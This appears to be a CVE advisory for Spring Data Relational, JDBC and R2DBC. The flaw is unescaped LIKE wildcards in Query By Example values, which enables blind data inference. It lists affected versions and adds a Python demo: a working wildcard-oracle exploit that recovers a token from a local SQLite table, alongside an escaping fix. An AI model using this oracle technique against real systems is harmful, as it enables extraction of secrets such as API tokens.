
Description

Spring Data Relational does not escape the LIKE wildcard characters in an externally controlled example value when Query By Example (QBE) is used with StringMatcher STARTING, ENDING or CONTAINING. The value is bound as a query parameter, so this is not a classic SQL injection; but the wildcards an attacker places in it (% and _) keep their meaning inside the generated LIKE pattern and widen the match beyond the intended prefix, suffix or substring test. By observing whether a probe value returns rows, an attacker can perform boolean-based blind data inference against the matched column. Affected versions: Spring Data Relational/JDBC/R2DBC 4.0.0 through 4.0.5; 3.5.0 through 3.5.11; 3.4.0 through 3.4.14; 3.3.0 through 3.3.16; 3.2.0 through 3.2.15; 3.1.0 through 3.1.14; 3.0.0 through 3.0.15; 2.4.0 through 2.4.19.
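The following is an added example, not Spring Data code, showing the mechanism the description refers to: a QBE-style STARTING/ENDING/CONTAINING matcher wraps the caller's value in % and binds the result to a LIKE, but leaves the caller's own % and _ unescaped. It runs the faulty and the hardened pattern builder against an in-memory SQLite table of constructed rows, then drives the unescaped variant as a boolean oracle to recover a column value one position at a time. The table, the user ids and the token values are assumptions for the demo; the escape character and the ESCAPE clause are the standard SQL way to neutralise LIKE metacharacters, not a description of the project's fix.

```python
"""Added example (not Spring Data code): unescaped LIKE wildcards inside a
bound Query-By-Example value act as a boolean oracle; escaping closes it.
The schema, users and tokens below are constructed for the demo."""
import sqlite3

# Constructed sample data (not from the advisory).
USERS = [
    (1, "alice", "tok-7f3a9c"),
    (2, "bob", "tok-0b11ee"),
    (3, "admin", "tok-deadbeef"),
]

LIKE_ESCAPE = "\\"


def connect():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, api_token TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn


def wrap_pattern(matcher, value):
    """Wrap a value the way STARTING/ENDING/CONTAINING wrap it into a LIKE pattern."""
    if matcher == "STARTING":
        return value + "%"
    if matcher == "ENDING":
        return "%" + value
    if matcher == "CONTAINING":
        return "%" + value + "%"
    raise ValueError(f"unsupported matcher {matcher!r}")


def like_pattern_unescaped(matcher, value):
    """Mirrors the faulty behaviour the advisory describes: the caller's value is
    wrapped, but its own % and _ are left intact and keep their LIKE meaning."""
    return wrap_pattern(matcher, value)


def escape_like(value, esc=LIKE_ESCAPE):
    """Escape the escape character first, then both LIKE metacharacters."""
    return (value.replace(esc, esc + esc)
                 .replace("%", esc + "%")
                 .replace("_", esc + "_"))


def like_pattern_escaped(matcher, value):
    """Hardened form: only the wrapper's own % characters act as wildcards."""
    return wrap_pattern(matcher, escape_like(value))


def find_usernames(conn, matcher, probe, escaped, user_id=None):
    """QBE-style lookup on api_token. The pattern is always a bound parameter, so
    this is wildcard injection inside a LIKE value, not classic SQL injection."""
    if escaped:
        pattern = like_pattern_escaped(matcher, probe)
        sql = "SELECT username FROM users WHERE api_token LIKE ? ESCAPE '\\'"
    else:
        pattern = like_pattern_unescaped(matcher, probe)
        sql = "SELECT username FROM users WHERE api_token LIKE ?"
    params = [pattern]
    if user_id is not None:
        sql += " AND id = ?"
        params.append(user_id)
    return sorted(row[0] for row in conn.execute(sql, params))


def _hit(conn, probe, escaped, user_id):
    """Boolean oracle: does a STARTING probe match the targeted row?"""
    return len(find_usernames(conn, "STARTING", probe, escaped, user_id)) == 1


def infer_token_length(conn, user_id, escaped, max_len=64):
    """k underscores become '____%', which matches iff len(token) >= k, so the
    largest matching k is the length. With escaping the underscores are literal
    and a token without '_' yields 0."""
    length = 0
    for k in range(1, max_len + 1):
        if not _hit(conn, "_" * k, escaped, user_id):
            break
        length = k
    return length


def infer_char(conn, user_id, position, alphabet, escaped):
    """'__x%' tests the character at one position without knowing the preceding
    ones; that position-skipping is what the wildcard buys the attacker."""
    for c in alphabet:
        if _hit(conn, "_" * position + c, escaped, user_id):
            return c
    return None


def recover_token(conn, user_id, escaped=False, alphabet="tok-0123456789abcdef"):
    """Drive the oracle end to end: learn the length, then each character."""
    n = infer_token_length(conn, user_id, escaped)
    return "".join(infer_char(conn, user_id, i, alphabet, escaped) or "?" for i in range(n))


if __name__ == "__main__":
    conn = connect()
    print(like_pattern_unescaped("CONTAINING", "50%_"), like_pattern_escaped("CONTAINING", "50%_"))
    print(find_usernames(conn, "ENDING", "_beef", escaped=False))  # wildcard reaches 'admin'
    print(find_usernames(conn, "ENDING", "_beef", escaped=True))   # literal '_beef': no rows
    print(recover_token(conn, user_id=2), repr(recover_token(conn, user_id=2, escaped=True)))
```

Two points worth noting when reviewing your own QBE usage. First, the escape routine must handle the escape character itself before the metacharacters, and the ESCAPE clause must name the same character, otherwise a backslash in user input re-opens the hole. Second, escaping removes the wildcard oracle but not the prefix oracle: if a STARTING matcher is exposed on a secret column, an attacker can still brute-force it one leading character at a time, so the matcher choice on sensitive fields is a design question independent of this fix.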

Status: PUBLISHED | Reserved 2026-04-22 | Published 2026-06-09 | Updated 2026-06-10 | Assigner: vmware

MEDIUM: 4.8 (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:L)

Problem types

CWE-943: Improper Neutralization of Special Elements in Data Query Logic

Product status

Three product entries are published for this record, each with default status "unaffected". This export does not carry the product names; the description covers Spring Data Relational, Spring Data JDBC and Spring Data R2DBC, and the 1.5.x range in the third entry matches the Spring Data R2DBC version line that shipped alongside Spring Data JDBC 2.4.x.

Entries 1 and 2 (identical version ranges)

4.0.0 before 4.0.6: affected
3.5.0 before 3.5.12: affected
3.4.0 before 3.4.15: affected
3.3.0 before 3.3.17: affected
3.2.0 before 3.2.16: affected
3.1.0 before 3.1.15: affected
3.0.0 before 3.0.16: affected
2.4.0 before 2.4.20: affected

Entry 3

4.0.0 before 4.0.6: affected
3.5.0 before 3.5.12: affected
3.4.0 before 3.4.15: affected
3.3.0 before 3.3.17: affected
3.2.0 before 3.2.16: affected
3.1.0 before 3.1.15: affected
3.0.0 before 3.0.16: affected
1.5.0 before 1.5.20: affected

References

spring.io/security/cve-2026-41697

cve.org (CVE-2026-41697)

nvd.nist.gov (CVE-2026-41697)